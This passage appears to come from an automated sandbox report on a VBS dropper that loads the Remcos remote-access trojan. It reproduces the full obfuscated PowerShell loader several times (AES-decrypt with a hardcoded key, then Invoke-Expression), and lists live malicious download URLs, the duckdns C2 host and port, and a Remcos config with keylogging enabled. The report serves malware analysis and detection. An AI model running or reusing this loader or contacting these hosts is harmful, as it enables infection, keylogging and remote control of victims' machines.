Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI16942742004897547110020442916503CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIAiyJ4w4PDxrjYBTpE+kCMXAi0n0WFrEwTQqO6Ll9vCemso5/Wu4WU8DFicwqoQGgHUNsDgf18ada181Zl+9aIMRyGbBhOQL1xtRLUPEYoMibGKdW5HX/pyEQS0Jw3Vh2+CYHtXZW4mAXpPVkuI6gUlIz8DEsOP8YwWP+kL3LpnXUvoD/qBKfflwTqLdaSslAUZJBizi2g2Z8nGQwpbShstgk8iXwe1n31tDVYVkp3T5T5WY1HmUD74K+YmOudrHG5Myz3duSqcna3IjfjlEbg/ZIO/KCvQGjgfJjV8ugk/Yy2P5Oa+5QFOgc8iixUoiNIoPAYztidKVOOGmbgFMbkku0XGVqmJjKcyMtEJtArogT9aYZx/ed96FLgWK+okfu0GPY3zgarb0LJ0UOULymAYnqJJj3ofVS7De8JjcTEqBknfr/caOlBiLhsYNQWSOgsDhrRvf5YYzMpM83vqh06V2szJv2yAB9LsAHIGxJWtU+c0ovHZ5Vdqtl/xa+xpgCscC3s+9s4OttMJQD+Y6OgggjtZYrP3PNltGTuGXGV6FdDehpSU/xdy/8GAxcGUjH9Mr8gb130Pu+0YBW9HdBQ2iWvdVhvMv9Qexc/zgzM2wKPrSh6KwTAbvQCmsP7v0n0diE/lfStsBI95daYr1R09j361KgVwHJfGtSYJKTiZxk3Kjr8ned9cTP7Hr1sIs66dD0GkNgVgIBM3hQi4l/JbuLztLdOqUSCMtPOJbMVvd+MpGtoXPGCTnJjImLTYVVP67C5k3Tf8ib1O6pKQeQcxhQ5hyr1qq3EQ0hJl5ZNCjy/SUT8QdLtfUcum3xRlxAeH032MIpclIzJhwFgmOsJsKiJLds99V3vTPgCXZZnxnNS2du/73NT4UYFNd4J7+I54BTGng1g4J6A5nhvO9KkoFS0c0denf7crIdeMf7pSj0inJztc2aRCT3AEJT3zVJwCBYKOYKPppt5njp0JLB5aB1OBZOO8YTYn1Zek16QtXF/UDhcFSHjS/B3tfXkD2tRnhujolV+Fes7ISTg3tPOFFvRigpQFL4IgLPiP2k7alWxEZHAX+W9FTNKh054AIMuEYzSP0JTVG2VJBq1OAfoQjhBvwQGKAAzRNd+6L+lgQp6ASIjm8tteW0NYUDIsW5x5Js0LElEjrFSiSmbujrdPEw/2oL5TaVIPCWAWwofdzk+coQ0nI1BV4Ecz4/ITbC8RsV1s7k18zvJwByHMIMM9IrxaprgzKSCaODhTKxF53rNwycY7cipt+8OD/N5OYtYZcvj7SdQKqL5DqbVs23F23QxJW9fAyZGdFz8Roqgg9TRDb2FyYfFHPkwCgRN8f9lD4F+Xjt70yId/tbDb3DUwEzhVgMNSBmOaW6o9DawkzEHDJcdtOzPNSKtye26n8CIG+NRXD0lhN5RBg3MLzMew==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
                    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\screensimplethingstohandlecream.gIF.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\screensimplethingstohandlecream.gIF.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\screensimplethingstohandlecream.gIF.vbs", ProcessId: 2076, ProcessName: wscript.exe
                    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\nkpfvnsml", CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\nkpfvnsml", CommandLine|base64offset|contains: ^, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentProcessId: 1344, ParentProcessName: RegAsm.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\nkpfvnsml", ProcessId: 7228, ProcessName: RegAsm.exe
                    Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\screensimplethingstohandlecream.gIF.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\screensimplethingstohandlecream.gIF.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\screensimplethingstohandlecream.gIF.vbs", ProcessId: 2076, ProcessName: wscript.exe
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI16942742004897547110020442916503CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIAiyJ4w4PDxrjYBTpE+kCMXAi0n0WFrEwTQqO6Ll9vCemso5/Wu4WU8DFicwqoQGgHUNsDgf18ada181Zl+9aIMRyGbBhOQL1xtRLUPEYoMibGKdW5HX/pyEQS0Jw3Vh2+CYHtXZW4mAXpPVkuI6gUlIz8DEsOP8YwWP+kL3LpnXUvoD/qBKfflwTqLdaSslAUZJBizi2g2Z8nGQwpbShstgk8iXwe1n31tDVYVkp3T5T5WY1HmUD74K+YmOudrHG5Myz3duSqcna3IjfjlEbg/ZIO/KCvQGjgfJjV8ugk/Yy2P5Oa+5QFOgc8iixUoiNIoPAYztidKVOOGmbgFMbkku0XGVqmJjKcyMtEJtArogT9aYZx/ed96FLgWK+okfu0GPY3zgarb0LJ0UOULymAYnqJJj3ofVS7De8JjcTEqBknfr/caOlBiLhsYNQWSOgsDhrRvf5YYzMpM83vqh06V2szJv2yAB9LsAHIGxJWtU+c0ovHZ5Vdqtl/xa+xpgCscC3s+9s4OttMJQD+Y6OgggjtZYrP3PNltGTuGXGV6FdDehpSU/xdy/8GAxcGUjH9Mr8gb130Pu+0YBW9HdBQ2iWvdVhvMv9Qexc/zgzM2wKPrSh6KwTAbvQCmsP7v0n0diE/lfStsBI95daYr1R09j361KgVwHJfGtSYJKTiZxk3Kjr8ned9cTP7Hr1sIs66dD0GkNgVgIBM3hQi4l/JbuLztLdOqUSCMtPOJbMVvd+MpGtoXPGCTnJjImLTYVVP67C5k3Tf8ib1O6pKQeQcxhQ5hyr1qq3EQ0hJl5ZNCjy/SUT8QdLtfUcum3xRlxAeH032MIpclIzJhwFgmOsJsKiJLds99V3vTPgCXZZnxnNS2du/73NT4UYFNd4J7+I54BTGng1g4J6A5nhvO9KkoFS0c0denf7crIdeMf7pSj0inJztc2aRCT3AEJT3zVJwCBYKOYKPppt5njp0JLB5aB1OBZOO8YTYn1Zek16QtXF/UDhcFSHjS/B3tfXkD2tRnhujolV+Fes7ISTg3tPOFFvRigpQFL4IgLPiP2k7alWxEZHAX+W9FTNKh054AIMuEYzSP0JTVG2VJBq1OAfoQjhBvwQGKAAzRNd+6L+lgQp6ASIjm8tteW0NYUDIsW5x5Js0LElEjrFSiSmbujrdPEw/2oL5TaVIPCWAWwofdzk+coQ0nI1BV4Ecz4/ITbC8RsV1s7k18zvJwByHMIMM9IrxaprgzKSCaODhTKxF53rNwycY7cipt+8OD/N5OYtYZcvj7SdQKqL5DqbVs23F23QxJW9fAyZGdFz8Roqgg9TRDb2FyYfFHPkwCgRN8f9lD4F+Xjt70yId/tbDb3DUwEzhVgMNSBmOaW6o9DawkzEHDJcdtOzPNSKtye26n8CIG+NRXD0lhN5RBg3MLzMew==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
                    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI16942742004897547110020442916503CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIAiyJ4w4PDxrjYBTpE+kCMXAi0n0WFrEwTQqO6Ll9vCemso5/Wu4WU8DFicwqoQGgHUNsDgf18ada181Zl+9aIMRyGbBhOQL1xtRLUPEYoMibGKdW5HX/pyEQS0Jw3Vh2+CYHtXZW4mAXpPVkuI6gUlIz8DEsOP8YwWP+kL3LpnXUvoD/qBKfflwTqLdaSslAUZJBizi2g2Z8nGQwpbShstgk8iXwe1n31tDVYVkp3T5T5WY1HmUD74K+YmOudrHG5Myz3duSqcna3IjfjlEbg/ZIO/KCvQGjgfJjV8ugk/Yy2P5Oa+5QFOgc8iixUoiNIoPAYztidKVOOGmbgFMbkku0XGVqmJjKcyMtEJtArogT9aYZx/ed96FLgWK+okfu0GPY3zgarb0LJ0UOULymAYnqJJj3ofVS7De8JjcTEqBknfr/caOlBiLhsYNQWSOgsDhrRvf5YYzMpM83vqh06V2szJv2yAB9LsAHIGxJWtU+c0ovHZ5Vdqtl/xa+xpgCscC3s+9s4OttMJQD+Y6OgggjtZYrP3PNltGTuGXGV6FdDehpSU/xdy/8GAxcGUjH9Mr8gb130Pu+0YBW9HdBQ2iWvdVhvMv9Qexc/zgzM2wKPrSh6KwTAbvQCmsP7v0n0diE/lfStsBI95daYr1R09j361KgVwHJfGtSYJKTiZxk3Kjr8ned9cTP7Hr1sIs66dD0GkNgVgIBM3hQi4l/JbuLztLdOqUSCMtPOJbMVvd+MpGtoXPGCTnJjImLTYVVP67C5k3Tf8ib1O6pKQeQcxhQ5hyr1qq3EQ0hJl5ZNCjy/SUT8QdLtfUcum3xRlxAeH032MIpclIzJhwFgmOsJsKiJLds99V3vTPgCXZZnxnNS2du/73NT4UYFNd4J7+I54BTGng1g4J6A5nhvO9KkoFS0c0denf7crIdeMf7pSj0inJztc2aRCT3AEJT3zVJwCBYKOYKPppt5njp0JLB5aB1OBZOO8YTYn1Zek16QtXF/UDhcFSHjS/B3tfXkD2tRnhujolV+Fes7ISTg3tPOFFvRigpQFL4IgLPiP2k7alWxEZHAX+W9FTNKh054AIMuEYzSP0JTVG2VJBq1OAfoQjhBvwQGKAAzRNd+6L+lgQp6ASIjm8tteW0NYUDIsW5x5Js0LElEjrFSiSmbujrdPEw/2oL5TaVIPCWAWwofdzk+coQ0nI1BV4Ecz4/ITbC8RsV1s7k18zvJwByHMIMM9IrxaprgzKSCaODhTKxF53rNwycY7cipt+8OD/N5OYtYZcvj7SdQKqL5DqbVs23F23QxJW9fAyZGdFz8Roqgg9TRDb2FyYfFHPkwCgRN8f9lD4F+Xjt70yId/tbDb3DUwEzhVgMNSBmOaW6o9DawkzEHDJcdtOzPNSKtye26n8CIG+NRXD0lhN5RBg3MLzMew==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'

                    Stealing of Sensitive Information

                    barindex
                    Source: Registry Key setAuthor: Joe Security: Data: Details: EA C8 31 73 B7 22 BD 86 63 B7 22 9B BF FC 88 10 5E D8 EC 78 D6 45 68 54 2D A5 DA 58 3A 0D 7D C3 1A D3 27 79 15 6F B5 E6 A1 88 28 0F 3F D0 9F E3 86 F7 3E 72 BE 64 ED D4 57 92 72 6C 0E 20 E0 BC 31 C8 0B 36 A7 95 21 CB 02 36 57 63 02 57 C1 38 7F 31 62 8E 11 F0 B7 86 E2 8F 01 5D A1 B7 0E 7A E7 80 57 3B 63 1C 38 55 C2 11 49 C4 69 6E B2 F3 CA B3 , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 1344, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-F4JFYD\exepath
                    No Snort rule has matched
                    Timestamp:2024-07-27T13:30:06.136562+0200
                    SID:2036594
                    Source Port:49732
                    Destination Port:18576
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-07-27T13:30:07.666925+0200
                    SID:2036594
                    Source Port:49733
                    Destination Port:18576
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-07-27T13:30:57.538052+0200
                    SID:2022930
                    Source Port:443
                    Destination Port:49741
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-07-27T13:30:03.723034+0200
                    SID:2049038
                    Source Port:80
                    Destination Port:49730
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-07-27T13:30:19.338921+0200
                    SID:2022930
                    Source Port:443
                    Destination Port:49735
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-07-27T13:30:07.815303+0200
                    SID:2803304
                    Source Port:49734
                    Destination Port:80
                    Protocol:TCP
                    Classtype:Unknown Traffic
                    Timestamp:2024-07-27T13:30:04.722143+0200
                    SID:2020424
                    Source Port:80
                    Destination Port:49731
                    Protocol:TCP
                    Classtype:Exploit Kit Activity Detected
                    Timestamp:2024-07-27T13:30:02.639346+0200
                    SID:2047750
                    Source Port:80
                    Destination Port:49730
                    Protocol:TCP
                    Classtype:A Network Trojan was detected

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: maveing.duckdns.orgAvira URL Cloud: Label: malware
                    Source: http://198.46.176.133/Upload/vbs.jpegAvira URL Cloud: Label: malware
                    Source: http://192.3.176.154/50/HNBC.txtAvira URL Cloud: Label: malware
                    Source: 00000003.00000002.2929959756.0000000000F5A000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "maveing.duckdns.org:18576:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-F4JFYD", "Keylog flag": "1", "Keylog path": "Temp", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                    Source: maveing.duckdns.orgVirustotal: Detection: 8%Perma Link
                    Source: http://198.46.176.133Virustotal: Detection: 13%Perma Link
                    Source: maveing.duckdns.orgVirustotal: Detection: 8%Perma Link
                    Source: http://198.46.176.133/Upload/vbs.jpegVirustotal: Detection: 19%Perma Link
                    Source: screensimplethingstohandlecream.gIF.vbsVirustotal: Detection: 9%Perma Link
                    Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.powershell.exe.1f163071700.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.powershell.exe.1f163071700.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.2929959756.0000000000F5A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1760253899.000001F161F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1760253899.000001F162D9C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6744, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1344, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Notepo\logs.dat, type: DROPPED
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,3_2_00433837
                    Source: powershell.exe, 00000001.00000002.1760253899.000001F162D9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_a5bcc00a-f

                    Exploits

                    barindex
                    Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.powershell.exe.1f163071700.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.powershell.exe.1f163071700.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000001.00000002.1760253899.000001F161F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1760253899.000001F162D9C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6744, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1344, type: MEMORYSTR

                    Privilege Escalation

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004074FD _wcslen,CoGetObject,3_2_004074FD
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000001.00000002.1797742900.000001F16A790000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmp
